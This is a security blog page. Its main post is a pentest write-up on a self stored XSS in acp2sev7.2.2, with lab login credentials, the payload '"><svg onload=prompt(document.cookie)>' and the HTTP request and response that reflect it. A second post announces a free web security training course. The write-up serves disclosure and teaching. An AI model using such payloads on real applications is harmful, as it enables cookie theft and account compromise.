Wednesday, 19 February 2025

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description

- It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS.


Self Stored XSS #1

Steps to Reproduce:
  1. Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
  2. In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>

// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1
Host: 192.168.58.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
[...]

name="><svg onload=prompt(document.cookie)>&submit=Submit


// HTTP Response

HTTP/1.1 200 OK
Date: Wed, 19 Feb 2025 08:22:26 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1210
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<table border='1' cellpadding='2' cellspacing='2' width='850'>
<tr bgcolor='#C0C0C0'>
 <th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>
[...]

















at No comments:

Sunday, 16 February 2025

New Web Security Training Course !

Its been a while since I have released any papers related to web security. Without any further delay let me introduce you the "Web Security Training" training manual. 

Introduction

Aimed at those that would like to learn more about web security and web app pentesting. The "course" is freely available, with taking the approach of "learn as you practice". 

Each topic has a few bullet points describing what the vulnerability entails, then a screenshot and relevant payload, demonstrating the exploitation of the misconfiguration or the relevant issue.

Download Link

File is in PDF format. Requires the download of a VM (virtual machine) OWASP BWA. The course demonstrates OWASP Top 10 flaws and beyond. It is free of charge. Worth mentioning how good the "Mutillidae" web application is for training purposes.

https://drive[dot]google[dot]com/file/d/14FWeVKHz00hIrZH9x6Z4B5MHPH2K3cAu/view?usp=sharing

at No comments:
Subscribe to: Posts (Atom)

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description - It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS. Se...